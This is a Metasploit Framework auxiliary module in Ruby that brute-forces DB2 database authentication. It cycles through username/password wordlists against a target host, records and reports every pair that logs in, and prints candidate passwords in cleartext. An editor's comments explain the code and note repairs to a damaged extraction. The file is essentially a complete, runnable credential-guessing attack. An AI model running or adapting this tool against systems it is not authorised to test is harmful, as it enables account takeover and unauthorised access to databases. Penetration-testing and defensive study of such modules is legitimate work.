##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
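# Auxiliary scanner module that tries username/password pairs against a DB2
# instance and reports the service and any pair that authenticates.
#
# This listing was recovered from a blame view: the interleaved commit
# timestamps, the split "= >" hash rockets and the padding inside the
# double-quoted literals (for example " data ") were extraction damage that
# left the file unparsable, and they have been repaired here.
#
# Handling note: candidate pairs are printed in cleartext when VERBOSE is set,
# and every successful pair is printed and passed to report_auth_info, so
# console logs and the reporting backend end up holding live credentials.
class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::DB2
  include Msf::Auxiliary::AuthBrute
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  # Declares the module metadata and the options it adds: VERBOSE plus the
  # three wordlist paths, which default to files under
  # <install_root>/data/wordlists.
  def initialize
    super(
      'Name'        => 'DB2 Authentication Brute Force Utility',
      'Version'     => '$Revision$',
      'Description' => %q{This module attempts to authenticate against a DB2
        instance using username and password combinations indicated by the
        USER_FILE, PASS_FILE, and USERPASS_FILE options.},
      'Author'      => [ 'todb' ],
      'License'     => MSF_LICENSE
    )

    wordlists = File.join(Msf::Config.install_root, "data", "wordlists")

    register_options(
      [
        OptBool.new('VERBOSE', [ true, 'Verbose output', false ]),
        OptPath.new('USERPASS_FILE', [ false, "File containing (space-seperated) users and passwords, one pair per line", File.join(wordlists, "db2_default_userpass.txt") ]),
        OptPath.new('USER_FILE', [ false, "File containing users, one per line", File.join(wordlists, "db2_default_user.txt") ]),
        OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line", File.join(wordlists, "db2_default_pass.txt") ])
      ], self.class)

    # Users must use user/pass/userpass files.
    deregister_options('USERNAME', 'PASSWORD')
  end

  # Runs once per target address and walks every pair yielded by
  # each_user_pass.
  #
  # ip - address of the host being scanned; used only to build the
  #      "user:ip:port" bookkeeping key.
  #
  # The return value of do_login is not inspected here; the value of the block
  # is the result of the final assignment.
  def run_host(ip)
    each_user_pass do |user, pass|
      # No delay before the very first attempt.
      userpass_sleep_interval unless self.credentials_tried.empty?

      this_cred = [ user, ip, rport ].join(":")

      # Skip a pair identical to the last one tried for this key, and skip any
      # user that already has a working password recorded. Only the most
      # recent password per key is remembered in credentials_tried.
      next if self.credentials_tried[this_cred] == pass || self.credentials_good[this_cred]

      # 'DATABASE' is not registered in this file; presumably it comes from
      # the DB2 mixin -- confirm.
      do_login(user, pass, this_cred, datastore['DATABASE'])
      self.credentials_tried[this_cred] = pass
    end
  end

  # Makes one authentication attempt and reports the outcome.
  #
  # user      - username to try
  # pass      - password to try
  # this_cred - "user:ip:port" key under which a success is recorded
  # db        - database name, used in messages and in the reported credential
  #
  # Returns :done when the connection cannot be made, :error on a DRDA response
  # error, :next_user on a successful login and :fail on a rejected one.
  def do_login(user = nil, pass = nil, this_cred = nil, db = nil)
    verbose = datastore['VERBOSE']

    # The candidate pair is written into the module datastore (the options
    # deregistered in initialize) before db2_check_login is called; that
    # helper is presumably where they are read back -- confirm.
    datastore['USERNAME'] = user
    datastore['PASSWORD'] = pass

    print_status("Trying username:'#{user}' with password:'#{pass}' against #{rhost}:#{rport}") if verbose

    begin
      info = db2_check_login
    rescue ::Rex::ConnectionError
      print_error("#{rhost}:#{rport} : Unable to attempt authentication") if verbose
      return :done
    rescue ::Rex::Proto::DRDA::RespError => e
      # NOTE(review): this path returns without calling disconnect; confirm
      # that db2_check_login closes the socket when it raises.
      print_error("#{rhost}:#{rport} : Error in connecting to DB2 instance: #{e}") if verbose
      return :error
    end

    disconnect

    # Report service state. Reached for failed logins too: any response that
    # did not raise is treated as evidence of a DB2 service.
    report_service(
      :host => rhost,
      :port => rport,
      :name => "db2"
    )

    if info[:db_login_success]
      print_good("#{rhost}:#{rport} DB2 - successful login for '#{user}' : '#{pass}' against database '#{db}'")
      self.credentials_good[this_cred] = pass

      # Report credentials
      report_auth_info(
        :host      => rhost,
        :proto     => 'db2',
        :user      => user,
        :pass      => pass,
        :database  => db,
        :targ_host => rhost,
        :targ_port => rport
      )
      return :next_user
    else
      print_status("#{rhost}:#{rport} DB2 - failed login for '#{user}' : '#{pass}' against database '#{db}'") if verbose
      return :fail
    end
  end

end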